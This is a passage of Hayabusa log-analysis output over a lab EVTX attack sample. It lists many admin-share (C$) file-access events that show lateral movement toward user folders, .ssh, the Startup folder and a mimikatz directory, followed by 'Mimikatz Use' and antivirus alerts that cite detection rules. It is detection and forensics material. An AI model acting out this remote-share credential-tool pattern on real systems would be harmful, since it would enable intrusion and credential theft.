Users\Administrator.EXAMPLE\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Music\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\.ssh : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share 
Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\New folder : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\RDPWrap-v1.6.2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\translations : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\IEUser\Desktop\release\x32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\db : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\garbage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\memdumps : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\platforms : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\IEUser\Desktop\release\x32\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\db : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\memdumps : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\platforms : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\IEUser\Desktop\release\x64\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\winrar-cve : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Music : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\mimikatz_trunk : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\mimikatz_trunk\Win32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\mimikatz_trunk\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Documents : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network 
